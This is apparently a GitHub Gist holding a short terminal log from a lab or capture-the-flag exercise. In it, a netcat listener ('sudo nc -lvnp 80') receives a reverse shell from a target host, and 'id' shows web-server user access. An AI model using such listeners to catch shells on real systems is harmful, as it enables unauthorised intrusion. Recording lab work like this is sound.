Created
September 11, 2021 06:45
-
-
Save oxtd/5a7307845a5ed385d0f00dea8aa8f137 to your computer and use it in GitHub Desktop.
netcat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo nc -lvnp 80 130 ⨯ | |
| Ncat: Version 7.91 ( https://nmap.org/ncat ) | |
| Ncat: Listening on :::80 | |
| Ncat: Listening on 0.0.0.0:80 | |
| Ncat: Connection from 10.10.10.238. | |
| Ncat: Connection from 10.10.10.238:40976. | |
| /bin/sh: 0: can't access tty; job control turned off | |
| $ id | |
| uid=33(www-data) gid=33(www-data) groups=33(www-data) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment